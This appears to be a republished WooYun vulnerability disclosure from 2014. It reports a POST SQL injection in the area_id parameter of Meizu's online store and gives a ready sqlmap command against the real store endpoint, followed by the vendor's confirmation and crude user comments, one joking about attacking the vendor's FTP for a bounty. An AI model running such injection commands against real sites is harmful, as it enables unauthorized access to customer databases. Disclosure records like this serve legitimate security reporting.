魅族商城某处SQL注入

2015年6月30日02:28:02评论255 views字数 202阅读0分40秒阅读模式

摘要

2014-10-05：细节已通知厂商并且等待厂商处理中
2014-10-06：厂商已经确认，细节仅向厂商公开
2014-10-16：细节向核心白帽子及相关领域专家公开
2014-10-26：细节向普通白帽子公开
2014-11-05：细节向实习白帽子公开
2014-11-19：细节向公众公开

漏洞概要关注数(10) 关注此漏洞

缺陷编号： WooYun-2014-78404

漏洞标题：魅族商城某处SQL注入

漏洞作者： 24jason

提交时间： 2014-10-05 19:42

公开时间： 2014-11-19 19:44

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 12

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：字符类型注射

0人收藏

漏洞详情

披露状态：

简要描述：

魅族商城某处SQL注入

详细说明：

area_id参数存在post注入

code 区域

sqlmap -u "http://store.meizu.com/order/ajax_get_zip_code" --data="area_id=110103" --dbs

漏洞证明：

修复方案：

过滤参数

版权声明：转载请注明来源 24jason@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2014-10-06 22:09

厂商回复：

已在处理。

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2014-10-05 19:51 | [email protected] ( 普通白帽子 | Rank:288 漏洞数:27 | ANONYMOUS)

0

哎呦我操今天是魅族每个月大姨妈的日子么

1# 回复此人
2014-10-05 20:05 | 雷锋 ( 路人 | Rank:12 漏洞数:2 | 看人生万般无奈，看世间千姿百态...)

1

说：你们是不是雷军派来的

2# 回复此人
2014-10-05 20:18 | [email protected] ( 普通白帽子 | Rank:288 漏洞数:27 | ANONYMOUS)

1

雷军大哥，求赏金，我立马日了他FTP

3# 回复此人
2014-10-05 20:26 | j14n ( 普通白帽子 | Rank:2144 漏洞数:385 )

1

黄章要爆粗口了。

4# 回复此人
2014-10-05 23:44 | px1624 ( 普通白帽子 | Rank:1171 漏洞数:207 | px1624)

1

看来在官网买魅族手机的话，就悲剧了额。。

5# 回复此人
2014-10-06 09:02 | 第四维度 ( 实习白帽子 | Rank:90 漏洞数:45 | 将点成线...)

1

FUCK！！

6# 回复此人

漏洞概要 关注数(10) 关注此漏洞